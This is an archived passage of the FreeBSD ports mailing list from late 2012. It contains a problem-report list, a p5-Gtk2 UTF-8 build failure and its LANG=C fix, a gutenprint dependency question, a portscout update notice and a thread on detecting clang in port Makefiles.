sysutils/fusefs-smbnetfs crash since fusefs-libs updat o ports/171932 wrong excutable program installed in ports/biology/mop f ports/171931 [PATCH] net-mgmt/zabbix-server: update to 1.8.15 f ports/171928 [patch update] security/strongswan 4.5.3 -> 5.0.0 o ports/171921 New port: devel/ocltools: f ports/171917 databases/mantis: Database query failed. Error receive o ports/171914 New port: devel/pocl: Portable open source OpenCL 1.2 o ports/171912 [NEW PORT] devel/pear-channel-phpdoc: PEAR channel pea f ports/171903 net-mgmt/observium port should only provide dependenci f ports/171893 [BUG] sysutils/ezjail: ezjail_admin update -b (Cannot f ports/171886 [PATCH] multimedia/gpac-mp4box: [SUMMARIZE CHANGES] f ports/171878 textproc/libsphinxclient port is incompatible with sph o ports/171870 [NEW PORT] games/visualspell: Challenges players to us o ports/171869 [NEW PORT] games/multiplik12: Educational game for lea o ports/171868 [new port] net/remotebox: Open Source VirtualBox Clien o ports/171855 [NEW PORT] net-mgmt/node-statsd - Simple daemon for ea f ports/171850 Misleading pkg install option in sysutils/fusefs-kmod f ports/171849 databases/postgis: port switches compiler! GCC -> CLAN f ports/171818 Please add option for Python-integration to sysutils/b o ports/171801 www/sams: Problem with creating MySQL database from sq o ports/171792 patch: allow games/xmille to select starting player ra o ports/171768 [UPDATE] devel/libffi: update to 3.0.11 o ports/171760 New port: cad/sweethome3d f ports/171749 [NEW PORT] devel/pear-Pirum: A simple PEAR channel ser o ports/171735 [NEW PORT] editors/py31-loook-devel: Simple Python too o ports/171734 [NEW PORT] editors/py27-loook: Simple Python tool that f ports/171707 multimedia/mplayer: i386 clang build error o ports/171675 [NEW PORT] games/cocos2d: Framework for building 2D ga o ports/171674 [NEW PORT] audio/alure: Utility library to help manage f ports/171605 net-mgmt/netams 3.4.5 compilation error o ports/171603 [NEW PORT] games/py27-dcross: Blocks fall from the top o ports/171602 [NEW PORT] games/py27-cargocarrier: Collect cargo crat o ports/171576 [NEW PORT] games/py27-bombz: Simple 2D puzzle game wit o ports/171559 [NEW PORT] games/airstrike: 2d biplane dogfight game o ports/171552 [NEW PORT] games/traingame: Game about Trains f ports/171539 [patch] net-mgmt/nrpe2 small fixes f ports/171523 [PATCH] devel/boost-libs: Allow building using Clang, o ports/171486 [NEW PORT] games/help_hannahs_horse: Pacman with a fas o ports/171431 [NEW PORT] games/asteroid: Modern version of the arcad o ports/171429 [NEW PORT] games/pyspacewar: Two ships duel in a gravi o ports/171398 [PATCH] devel/pecl-inclued: update to 0.1.3,1 o ports/171392 [NEW PORT] games/py27-super_mario_bros_python: Clone o o ports/171391 [NEW PORT] games/py27-pytowerdefense: Tower Defense Ga f ports/171388 news/hellanzb doesn't work anymore since Fbsd 9.0 o ports/171378 New port: x11-wm/herbstluftwm Manual tiling window man f ports/171338 both databases/mariadb-scripts and databases/mariadb-s o ports/171332 [NEW PORT] games/py27-pythonsudoku: Text and graphical o ports/171323 [NEW PORT] games/hitori: Logic game similar to Sudoku o ports/171237 [NEW PORT] games/schiff: Steer your ship(s) with the k o ports/171236 [NEW PORT] games/schwarzweiss: Tank game for 2 players f ports/171231 audio/clementine-player starts only at the second time o ports/171224 [NEW PORT] games/bouncy: You are a hungry rabbit. Eat o ports/171176 new port: net/winexe f ports/171160 sysutils/loganalyzer depends on php5 s ports/171153 new version available for net-mgmt/coovachilli o ports/171149 new port: textproc/imsettings - a framework manages in o ports/171106 New Port: net/jdownloader - Download manager (java) o ports/171079 graphics/rawtherapee hangs x11 o ports/171019 [new port] science/isis3: USGS ISIS3 planetary mapping o ports/171017 [new port] astro/cspice: New scientific port: NASA/NAI f ports/171005 Updated port sysutils/rubygem-chef o ports/170941 [NEW PORT] games/brickout: A ball-and-paddle game wher o ports/170939 [NEW PORT] games/popstar: Simple puzzle game involving o ports/170918 [NEW PORT] games/entombed: A one- or two-player maze g o ports/170887 [NEW PORT] games/fightorperish: A dungeon-crawling gam f ports/170882 sysutils/bacula-server - Feature Request - Change sysc o ports/170836 [NEW PORT] games/agendaroids: Vector-based rock-shooti o ports/170823 [new port] multimedia/podcastdl: simple podcast client o ports/170819 New port: net-mgmt/UniFi UniFi Wireless Controller f ports/170773 sysutils/bacula-server overlaps with sysutils/backula- o ports/170695 sysutils/fusefs-ntfs - instant reboot when mv from UFS o ports/170662 [NEW PORT] devel/pymunk: A easy-to-use pythonic 2d phy o ports/170661 [NEW PORT] graphics/py27-pyglet-devel: Cross-platform f ports/170641 x11-toolkits/open-motif: need mkcatdefs utility f ports/170616 gpk-update-viewer o ports/170569 sysutils/sec does not start automatically at boot time f ports/170542 sysutils/bsdadminscripts does not build correctly in m f ports/170538 x11-wm/enlightenment build breaks f ports/170537 devel/libftdi seems broken on i386 and amd64 o ports/170448 [NEW PORT] devel/allegro5: Allegro 5 is a game program f ports/170381 x11/slim window manager gives dbus errors starting xfc f ports/170366 lang/libobjc2: update to 1.6.1 f ports/170357 net-mgmt/tcptrack Segmentation fault (core dumped) f ports/170347 New port: benchmarks/nosqlbench Micro-benchmarking NoS f ports/170344 [UPDATE] net/tcpflow: update to 1.2.8, take maintainer f ports/170339 www/node: segmentation violation in v8::internal::Hand o ports/170242 [PATCH] devel/arduino: fix avr-libc SIG_USART1_RECV is o ports/170241 [PATCH] devel/libftdi: upgrade to 0.20 and fix automak f ports/170186 Update sysutils/modules to version 3.2.9 o ports/170185 sysutils/mgeupsd not correctly works. f ports/170172 x11-toolkits/gtkglext: Fix USE_XORG f ports/170150 games/uhexen2: Update to version 1.5.3 f ports/170100 astro/orsa: version 0.7.0 in ports hopelessly outdated o ports/170016 net/liveMedia: update to 2012.07.18 release o ports/170000 emulators/vmware-tools6: Can not install VMware Tools o ports/169877 New port: security/pam_search_list : PAM module to sea f ports/169876 devel/flyspray: Strict Standards: Non-static method Fl o ports/169741 [new port] devel/visualparadigm o ports/169736 Patch for broken net-im/libjingle port f ports/169716 net-mgmt/ndpmon several problems with build and instal o ports/169628 sysutils/devcpu-data f ports/169613 security/botan: Fix ECDSA for dns/powerdns and maybe o f ports/169521 astro/weatherspect: Exiting with SIGUse of uninitializ o ports/169519 [net/cvsup] socksify and cvsup cannot be used together o ports/169492 [new port] databases/pecl-sqlite must be restored o ports/169371 port graphics/sane-backends segfaults f ports/169333 [PATCH] sysutils/syslog-ng2: move sample config to EXA o ports/169322 New port: net/armsd: SMFv2/ARMS Service Adapter daemon f ports/169165 sysutils/fusefs-kmod: calling fchown(2) on sshfs files f ports/168935 www/firefox-remote shares PORTNAME with www/firefox o ports/168926 Second '59.xxx' out of range 0..59 at security/snort-r o ports/168861 devel/tkcvs: tkdiff no longer runs correctly o ports/168671 [exp-run] Make devel/cmake and devel/cmake-gui not use o ports/168647 Remove trailing spaces from all ports-related files f ports/168611 conflict: cad/brlcad: Port shares files with other por o ports/168491 [NEW PORT] www/py27-django-mezzanine: An open source C s ports/168486 [PATCH] www/sams, warnings "strftime() [function.strft f ports/168466 [PATCH] www/sams, web-interface, needs GetHostnameSam. f ports/168407 [patch] lang/gauche: update to 0.9.3.2, unbreak o ports/168404 [NEW PORT] databases/dev-sqlite3: This is a developmen o ports/168328 [REPOCOPY] devel/codeblocks --> devel/codeblocks-devel f ports/168319 graphics/qiviewer: Not displaying image jpeg o ports/168215 [PATCH] print/scribus-devel: update to 1.5.0 svn f ports/168161 [PATCH] sysutils/conky: update to 1.9.0 f ports/168160 ports-mgmt/jailaudit doesn't return a non-0 exit code o ports/168114 [NEW PORT] games/duckmaze: A game about a duck that is s ports/167955 [update] graphics/tinyows: Fix dependency to postgis f ports/167953 devel/pecl-xhprof patch for single core cpu f ports/167950 databases/memcachedb does not work on 10-CURRENT o ports/167759 [New Ports] x11-wm/e17-modules-ecomorph and x11-wm/eco f ports/167691 security/heimdal: problem compiling kerberos/heimdal f ports/167352 New port: devel/py-repoze.lru f ports/167090 sysutils/ezjail: Invalid command line option in ezjail f ports/167074 New Port: www/drupal7-ldap o ports/167042 New port: net-p2p/tahoe-lafs f ports/167031 security/heimdal ignore environment after process call f ports/166987 net/nss_ldap: ports/152982 causes nss_ldap to not func o ports/166826 New port: misc/libphidget The driver for Phidgets devi o ports/166812 New port: mail/bounceHammer o ports/166522 lang/f77: Fortran 77 compiler always exits with error f ports/166417 rc script for net/delegate (ports) o ports/166006 Problem with mail/postfix and mail/mailman integration f ports/166004 www/squid31 3.1.19 crashes on first request o ports/165713 New port: net-mgmt/p5-FusionInventory-Agent-Task-NetDi o ports/165711 New port: net-mgmt/p5-FusionInventory-Agent-Task-SNMPQ f ports/165672 sysutils/bacula-server doesn't install all symlinks ne o ports/165586 New port german/lx-office-erp, sql-ledger fork with ex o ports/165565 New port: www/mod_auth_token Token-based authenticatio f ports/165361 x11-wm/e17-module-mem counts memory incorrectly f ports/164941 [UPDATE] [NEW PORTS] jamvm/classpath w/o jdk o ports/164306 update mail/mailagent to 3.1.77 and utmpx fix o ports/164197 smsd(comms/smstools3) doesn't read some configurations o ports/164060 net/ucarp doesn't work on FreeBSD 9.0-PRERELEASE o ports/164055 sysutils/zfs-periodic: Test if scrubbing is in process o ports/163955 input packet for interface are counted twice o ports/163850 New port: cad/linux-bricscad a ports/163665 [New Port]: devel/gerrit - Web based code review and p f ports/163126 security/sshguard changed from syslog.conf to daemon b o bin/162681 pkg_add(1): new installer does not add doc packages o ports/162607 little correction for comms/smstools3 o ports/162045 print/ghostview 1.5_2 coredumps on certain files f ports/161690 New port: games/prboom-plus Port of ID Software's Doom o ports/161578 devel/strace is not working f ports/161278 net/dante: getoutaddr(): address [...] selected, but n f ports/161070 infinite loop for graphics/xfig on 9.0-CURRENT s ports/160993 New port: security/sqlcipher f ports/159242 New port: sysutils/fuse-zip FUSE filesystem to mount Z f ports/159177 sysutils/muse on 8.2-STABLE o ports/159003 devel/cross-gcc attempts to use $PRFIX/../../ranlib on o ports/158983 [NEW PORT] devel/pecl-dtrace: PHP DTrace provider o ports/157544 Updates for databases/linux-oracle-instantclient-* a ports/157504 [new port] net-mgmt/zenpack-NetApp: Provides monitorin o ports/157107 conflict between mail/p5-Mail-SPF and mail/libspf2 o ports/156834 New port: games/fairymax-devel latest version of games o ports/155941 net/nepenthes: mwserv library support is not included f ports/155898 Update port devel/libthai f ports/155115 devel/doxygen: dependancy loop o ports/154352 [patch] multimedia/xmms: update using desktop and mime f ports/154118 graphics/ruby-rmagick: rmagick fails to automaticly re o ports/151747 new port: emulators/wine-fbsd64: request for (a variat o ports/151280 emulators/vmware-guestd6 port install error in /usr/po o ports/150425 www/squid31: rc.d/squid's squid_fib setting ineffectiv o ports/148996 net/cvsup-mirror doesn't use preassigned UID/GIDs o ports/147788 x11-drivers/xf86-video-radeonhd-devel 1.3.0.20091101_3 o ports/140170 net/liveMedia: install shared libraries and thus fix r o ports/103751 databases/linux-oracle-instantclient-sqlplus: ldconfig 537 problems total. From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 12:41:59 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id EC8467B for ; Mon, 26 Nov 2012 12:41:58 +0000 (UTC) (envelope-from awarecons@gmail.com) Received: from mail-vc0-f182.google.com (mail-vc0-f182.google.com [209.85.220.182]) by mx1.freebsd.org (Postfix) with ESMTP id 9BC048FC0C for ; Mon, 26 Nov 2012 12:41:58 +0000 (UTC) Received: by mail-vc0-f182.google.com with SMTP id fo13so15056578vcb.13 for ; Mon, 26 Nov 2012 04:41:52 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:date:message-id:subject:from:to:content-type; bh=pY2/1lkhDxK+tQeQiiEL8nmSseoHSyVe4X4Hlfgr7cQ=; b=wr9vmsC2Hc9Ro6mpLTMjyiMaFYOlUiK6OvulzN/rmEofGOtnnSF1vdKr7TrJB7+8UR zno2PLGO4Kiu2x9EGqDHGsZ9E2eCJgFRSNZlZCDZRL6d9nTFPj/uxmAJ5VrQxvt5TMsG YfktrNau1coubkgPIY5naGH2C2s1IQbeuIz28L3mgtQ4lM9fsQ3L88mpL/qIj4jWrySk lQ0mOxA1KpE66LdIsU360Sk0SVnnbHMqh7ihU3Pu2Cq5B5nr5Lk5B7ByTbArPDEv0XBh vjoiLqJtJBoVTRP1Ir61HwhZx8Y8LeeujgUnqQKa49rE2A3DALA3dWQqoLDnzgiW0bwM BIgA== MIME-Version: 1.0 Received: by 10.220.226.67 with SMTP id iv3mr18597206vcb.57.1353933712046; Mon, 26 Nov 2012 04:41:52 -0800 (PST) Received: by 10.220.230.138 with HTTP; Mon, 26 Nov 2012 04:41:51 -0800 (PST) Date: Mon, 26 Nov 2012 16:41:51 +0400 Message-ID: Subject: p5-Gtk2-1.243 ISSUE Malformed UTF-8 character From: awarecons To: ports@freebsd.org Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 12:41:59 -0000 in /usr/ports/emulators/qemu-launcher. # make install clean =3D=3D=3D> Installing for qemu-launcher-1.7.4_6 =3D=3D=3D> qemu-launcher-1.7.4_6 depends on package: p5-Gtk2>=3D0 - not f= ound =3D=3D=3D> Verifying install for p5-Gtk2>=3D0 in /usr/ports/x11-toolkits= /p5-Gtk2 =3D=3D=3D> Building for p5-Gtk2-1.243 Generating POD... Loaded 9 extra types from doctypes Loaded 2 extra types from /usr/local/lib/perl5/site_perl/5.16.2/mach/Pango/Install/doctypes Loaded 8 extra types from /usr/local/lib/perl5/site_perl/5.16.2/mach/Glib/Install/doctypes Loaded 7 extra types from /usr/local/lib/perl5/site_perl/5.16.2/mach/Cairo/Install/doctypes Malformed UTF-8 character (unexpected non-continuation byte 0xc2, immediately after start byte 0xc1) in pattern match (m//) at /usr/local/lib/perl5/5.16.2/mach/Data/Dumper.pm line 558. Malformed UTF-8 character (fatal) at /usr/local/lib/perl5/5.16.2/mach/Data/Dumper.pm line 558. gmake: *** [build/podindex] =EF=DB=C9=C2=CB=C1 25 *** Error code 1 Stop in /usr/ports/x11-toolkits/p5-Gtk2. *** Error code 1 Stop in /usr/ports/emulators/qemu-launcher. From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 13:26:21 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id D8068A70 for ; Mon, 26 Nov 2012 13:26:21 +0000 (UTC) (envelope-from demelier.david@gmail.com) Received: from mail-pa0-f54.google.com (mail-pa0-f54.google.com [209.85.220.54]) by mx1.freebsd.org (Postfix) with ESMTP id ABC628FC12 for ; Mon, 26 Nov 2012 13:26:21 +0000 (UTC) Received: by mail-pa0-f54.google.com with SMTP id bi5so2356653pad.13 for ; Mon, 26 Nov 2012 05:26:20 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:date:message-id:subject:from:to:content-type; bh=nclLXTvcVPGEYp+Nw1ueM7a2cD/WulyliyZJJOLzAcU=; b=Z6XUTFeobLWTz8GK6/Ciswm13MjyIRODncHcxVu4lb2ZZ4r9xj0S7OiqQhltSv5VT+ FNas2ag+idSTi5lhsA2YCexliX//njAZw87Lw04sMFfG+vQ1KKYozJS3txKsFHXiCBFn OYW30oTJ1b0pv0BsUxO3ZPS3HMFnyNT6L2iV5oiOgt0e2x5myNvKeDoR5guJWMMJV7mf KHcctxsaUDfv9ExLjX1cbWwrMa1e4wPwk4d4tGUFC02USk6FN2B6LhSGw1I0uupquQgx hIq4MGqUelYakFcH/MuGalF8P2UVztsIxb/knt6rERApts8WlTFsCht69YgzkZnAwdy8 kHAg== MIME-Version: 1.0 Received: by 10.68.202.72 with SMTP id kg8mr37909226pbc.134.1353936380260; Mon, 26 Nov 2012 05:26:20 -0800 (PST) Received: by 10.66.80.36 with HTTP; Mon, 26 Nov 2012 05:26:20 -0800 (PST) Date: Mon, 26 Nov 2012 14:26:20 +0100 Message-ID: Subject: Why gutenprint drivers need X11 / Gtk ? From: David Demelier To: freebsd-ports@freebsd.org Content-Type: text/plain; charset=UTF-8 X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 13:26:21 -0000 Hello, I would like to install cups + gutenprint for my Alix appliance, it is a very small CompactFlash of 2Go only and my printer needs guten print However when I prepared binary packages for guten print I just realized that is packaged a lot of X11 dependencies and Gtk, why gutenprint requires all this stuff ? I just want the drivers :) In my make.conf I have: WITHOUT_X11=yes WITHOUT_GNOME=yes ... Cheers, -- Demelier David From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 13:32:06 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 0435BB49 for ; Mon, 26 Nov 2012 13:32:05 +0000 (UTC) (envelope-from awarecons@gmail.com) Received: from mail-vc0-f182.google.com (mail-vc0-f182.google.com [209.85.220.182]) by mx1.freebsd.org (Postfix) with ESMTP id A22148FC0C for ; Mon, 26 Nov 2012 13:32:05 +0000 (UTC) Received: by mail-vc0-f182.google.com with SMTP id fo13so15131992vcb.13 for ; Mon, 26 Nov 2012 05:32:05 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:date:message-id:subject:from:to:content-type; bh=aGcXR+WUUzkbgIo/l3eH2BtlzeihnRh6yb1/yUK6vLw=; b=zMS7DjIFjAingXmhgDsVFv4xSpObT/FlsfSO1cwfBy+rF1yORtJ3EBRgcvDw59rLXa IsjB1M637PEanQtJkEmKNgofBddn9t5aLHGIERlzPdWRnPK58r92xWzJGd3ovZw/J9/A pCqAKH8BUQEiJ8HuZadts0n+u3OAJefEnJ8pWIVtCvQBgRL9GBHVx0lkc0jeayfvGmDH 0wGyDnUB2R9vkxSITdcpH5ILxOcJfVPWZ11E6qrUYP9B7kQch8uYMY0qA4wJTrX+Njyl nQS9NmivhHIOEhjsNJvKq5oXqUdU86AtIbWYqs8Iu5VQQ1w+TQBpljWi9l1/+4DOj+zr qHOg== MIME-Version: 1.0 Received: by 10.52.67.44 with SMTP id k12mr16557866vdt.15.1353936724771; Mon, 26 Nov 2012 05:32:04 -0800 (PST) Received: by 10.220.230.138 with HTTP; Mon, 26 Nov 2012 05:32:04 -0800 (PST) Date: Mon, 26 Nov 2012 17:32:04 +0400 Message-ID: Subject: p5-Gtk2-1.243 ISSUE Malformed UTF-8 character SOLVED From: awarecons To: ports@freebsd.org Content-Type: text/plain; charset=ISO-8859-1 X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 13:32:06 -0000 ===> Building for p5-Gtk2-1.243 Generating POD... Loaded 9 extra types from doctypes Loaded 2 extra types from /usr/local/lib/perl5/site_perl/5.16.2/mach/Pango/Install/doctypes Loaded 8 extra types from /usr/local/lib/perl5/site_perl/5.16.2/mach/Glib/Install/doctypes Loaded 7 extra types from /usr/local/lib/perl5/site_perl/5.16.2/mach/Cairo/Install/doctypes Malformed UTF-8 character (unexpected non-continuation byte 0xc2, immediately after start byte 0xc1) in pattern match (m//) at /usr/local/lib/perl5/5.16.2/mach/Data/Dumper.pm line 558. Malformed UTF-8 character (fatal) at /usr/local/lib/perl5/5.16.2/mach/Data/Dumper.pm line 558. gmake: *** [build/podindex] Error 25 *** Error code 1 Stop in /usr/ports/x11-toolkits/p5-Gtk2. *** Error code 1 Stop in /usr/ports/emulators/qemu-launcher. May be SOLVED by adding /usr/ports/x11-toolkits/p5-Gtk2/Makefile ENV+=LANG="C" or issuing command env LANG="C" make ... Thanks to http://forums.freebsd.org/showthread.php?t=28853 From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 15:01:42 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id B315E683 for ; Mon, 26 Nov 2012 15:01:42 +0000 (UTC) (envelope-from portscout@portscout.freebsd.org) Received: from null.zi0r.com (null.zi0r.com [71.245.171.204]) by mx1.freebsd.org (Postfix) with ESMTP id 64C6F8FC19 for ; Mon, 26 Nov 2012 15:01:42 +0000 (UTC) Received: from null.zi0r.com (localhost [127.0.0.1]) by null.zi0r.com (8.14.5/8.14.5) with ESMTP id qAQF1fOv046334 for ; Mon, 26 Nov 2012 10:01:41 -0500 (EST) (envelope-from portscout@portscout.freebsd.org) Received: (from portscout@localhost) by null.zi0r.com (8.14.5/8.14.5/Submit) id qAQF1fVM046317; Mon, 26 Nov 2012 10:01:41 -0500 (EST) (envelope-from portscout) Message-Id: <201211261501.qAQF1fVM046317@null.zi0r.com> MIME-Version: 1.0 Content-Disposition: inline Content-Transfer-Encoding: 8bit Content-Type: text/plain Date: Mon, 26 Nov 2012 10:01:41 -0500 From: portscout@portscout.freebsd.org To: ports@freebsd.org Subject: FreeBSD ports you maintain which are out of date X-Mailer: portscout/0.8.1 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 15:01:42 -0000 Dear port maintainer, The portscout new distfile checker has detected that one or more of your ports appears to be out of date. Please take the opportunity to check each of the ports listed below, and if possible and appropriate, submit/commit an update. If any ports have already been updated, you can safely ignore the entry. You will not be e-mailed again for any of the port/version combinations below. Full details can be found at the following URL: http://portscout.freebsd.org/ports@freebsd.org.html Port | Current version | New version ------------------------------------------------+-----------------+------------ cad/leocad | 0.77.0 | 0.78.1 ------------------------------------------------+-----------------+------------ chinese/xsim | 0.3.9.4 | 0.4 ------------------------------------------------+-----------------+------------ games/endgame-singularity | 0.30b | 0.30c ------------------------------------------------+-----------------+------------ games/tinymux | 2.6.5.33 | 2.10.1.12 ------------------------------------------------+-----------------+------------ graphics/sam2p | 0.49 | 0.49.1 ------------------------------------------------+-----------------+------------ misc/py-xdelta3 | 3.0.0 | 3-3.0.5 ------------------------------------------------+-----------------+------------ misc/xdelta3 | 3.0.0 | 3-3.0.5 ------------------------------------------------+-----------------+------------ multimedia/vstream-client | 1.2 | 1.2.1.1 ------------------------------------------------+-----------------+------------ net-mgmt/py-pyang | 1.1 | 1.2 ------------------------------------------------+-----------------+------------ net-p2p/libtorrent-rasterbar-15 | 0.15.9 | 0.16.5 ------------------------------------------------+-----------------+------------ net-p2p/libtorrent-rasterbar-15-python | 0.15.9 | 0.16.5 ------------------------------------------------+-----------------+------------ net-p2p/libtorrent-rasterbar-16 | 0.16.4 | 0.16.5 ------------------------------------------------+-----------------+------------ net-p2p/libtorrent-rasterbar-16-python | 0.16.4 | 0.16.5 ------------------------------------------------+-----------------+------------ science/py-netCDF4 | 1.0.1 | 1.0.2 ------------------------------------------------+-----------------+------------ security/fuzzdb | 1.08 | 1.09 ------------------------------------------------+-----------------+------------ sysutils/powerman | 2.3.9 | 2.3.16 ------------------------------------------------+-----------------+------------ If any of the above results are invalid, please check the following page for details on how to improve portscout's detection and selection of distfiles on a per-port basis: http://portscout.freebsd.org/info/portscout-portconfig.txt If wish to stop receiving portscout reminders, please contact portscout@portscout.freebsd.org Thanks. From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 15:22:31 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 5A67FF35; Mon, 26 Nov 2012 15:22:31 +0000 (UTC) (envelope-from lifanov@mail.lifanov.com) Received: from mail.lifanov.com (mail.lifanov.com [206.125.175.12]) by mx1.freebsd.org (Postfix) with ESMTP id 3BBE68FC15; Mon, 26 Nov 2012 15:22:31 +0000 (UTC) Received: from [10.1.6.138] (cnet520-windstream.mcclatchyinteractive.com [166.108.16.2]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by mail.lifanov.com (Postfix) with ESMTPSA id 10A3819E766; Mon, 26 Nov 2012 15:16:11 +0000 (UTC) Message-ID: <50B387BB.3000502@mail.lifanov.com> Date: Mon, 26 Nov 2012 10:16:11 -0500 From: Nikolai Lifanov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: freebsd-ports@freebsd.org Subject: Re: How to handle WITH_CLANG_IS_CC in ports References: <20121125114918.GA35966@oshi.local> <50B23382.3030600@FreeBSD.org> In-Reply-To: <50B23382.3030600@FreeBSD.org> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Cc: Tobias Rehbein , Dimitry Andric X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 15:22:31 -0000 On 11/25/2012 10:04 AM, Dimitry Andric wrote: > On 2012-11-25 12:49, Tobias Rehbein wrote: >> I am the maintainer of ganes/stonesoup. This port builds fine with gcc. >> It also builds with clang, if the MAKE_ARGS are tweaked. >> >> Currently I can check for >> >> ${CC:T:M*clang*} >> >> to know if I have to change the MAKE_ARGS for building with clang or >> not. >> >> In CURRENT cc is clang and the environment variable CC is no longer set. >> This lets the build of games/stonesoup fail. My question is how to >> correctly check if cc is clang or not. My first guess was something >> along the lines of >> >> ${CC:T:M*clang*} || (defined(WITH_CLANG_IS_CC) && ${CC:T:Mcc}) >> >> but I guess there is some kind of official way to handle this (ideally >> warpped in some Mk macro. > > Just check if OSVERSION >= 1000024, maybe? Or add some logic to > bsd.port.mk that handles this, like was done with pkgng. For example, > introducing a PORTS_COMPILER_TYPE macro like in base. This is bad. People with OSVERSION >= 1000024 and WITHOUT_CLANG_IS_CC set will be left out. How about something along the lines of this? bsd.compiler.mk: # # Sets CC variable if unset # .PHONY: setcc setcc: @if [ ! -z "`cc -v 2>&1|grep clang`" ] ; then \ CC?= clang; \ else \ CC?= gcc; \ fi Then, if a port needs this variable to be set, it can call "setcc" in the Makefile. From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 15:50:40 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 052F3BC for ; Mon, 26 Nov 2012 15:50:40 +0000 (UTC) (envelope-from dim@FreeBSD.org) Received: from tensor.andric.com (tensor.andric.com [87.251.56.140]) by mx1.freebsd.org (Postfix) with ESMTP id ACDA28FC15 for ; Mon, 26 Nov 2012 15:50:39 +0000 (UTC) Received: from [IPv6:2001:7b8:3a7:0:5996:6a9e:9a88:4013] (unknown [IPv6:2001:7b8:3a7:0:5996:6a9e:9a88:4013]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by tensor.andric.com (Postfix) with ESMTPSA id 4A7005C37; Mon, 26 Nov 2012 16:50:38 +0100 (CET) Message-ID: <50B38FCC.4050902@FreeBSD.org> Date: Mon, 26 Nov 2012 16:50:36 +0100 From: Dimitry Andric Organization: The FreeBSD Project User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Nikolai Lifanov Subject: Re: How to handle WITH_CLANG_IS_CC in ports References: <20121125114918.GA35966@oshi.local> <50B23382.3030600@FreeBSD.org> <50B387BB.3000502@mail.lifanov.com> In-Reply-To: <50B387BB.3000502@mail.lifanov.com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Cc: Tobias Rehbein , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 15:50:40 -0000 On 2012-11-26 16:16, Nikolai Lifanov wrote: > On 11/25/2012 10:04 AM, Dimitry Andric wrote: >> On 2012-11-25 12:49, Tobias Rehbein wrote: ... >> Just check if OSVERSION >= 1000024, maybe? Or add some logic to >> bsd.port.mk that handles this, like was done with pkgng. For example, >> introducing a PORTS_COMPILER_TYPE macro like in base. > > This is bad. > People with OSVERSION >= 1000024 and WITHOUT_CLANG_IS_CC set will be > left out. Well, this was just a simple example, I'm sure you can figure out a zillion interesting ways to do this. :-) From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 16:12:06 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id AEA32E36 for ; Mon, 26 Nov 2012 16:12:06 +0000 (UTC) (envelope-from villa.alberto@gmail.com) Received: from mail-wi0-f178.google.com 